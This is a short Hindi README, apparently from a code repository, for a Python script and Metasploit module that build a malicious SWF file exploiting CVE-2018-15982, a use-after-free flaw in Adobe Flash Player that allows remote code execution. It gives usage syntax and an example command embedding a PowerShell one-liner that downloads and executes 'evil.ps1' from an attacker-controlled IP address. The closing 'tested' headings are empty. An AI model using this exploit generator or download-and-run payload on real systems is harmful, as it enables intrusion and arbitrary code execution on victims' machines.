
# SWF पेलोड उत्पन्न करने के लिए Metasploit मॉड्यूल और Python स्क्रिप्ट जो CVE-2018-15982 का शोषण करती है, जो Adobe Flash Player में एक use-after-free भेद्यता है जो रिमोट कोड निष्पादन को सक्षम बनाती है।
यह स्क्रिप्ट CVE-2018-15982 के लिए एक swf पेलोड बनाती है, जो https://github.com/smgorelik/Windows-RCE-exploits से PoC पर आधारित है। यह भेद्यता Gigamon ATR के Chenming Xu और Ed Miles द्वारा खोजी गई थी।
यह भेद्यता एक उपयोग-के-बाद-मुक्त (use-after-free) दोष है जो फ्लैश में मनमाना कोड निष्पादन सक्षम बनाता है। अधिक जानकारी नीचे दिए गए लिंक में मिल सकती है।
नोट: वर्तमान में केवल एक ब्लॉक स्प्रे कर रहा है, मैंने स्क्रिप्ट बनाने के बाद यह देखा।
उपयोग:
python create_swf.py <command> <output file name>
उदाहरण उपयोग:
python create_swf.py "powershell.exe IEX (iwr 'http://192.168.56.101/evil.ps1')" downloadtest.swf
परीक्षण किया गया:
पेलोड बनाएं:

पेलोड निष्पादित करना:

निष्पादन की पुष्टि करें:

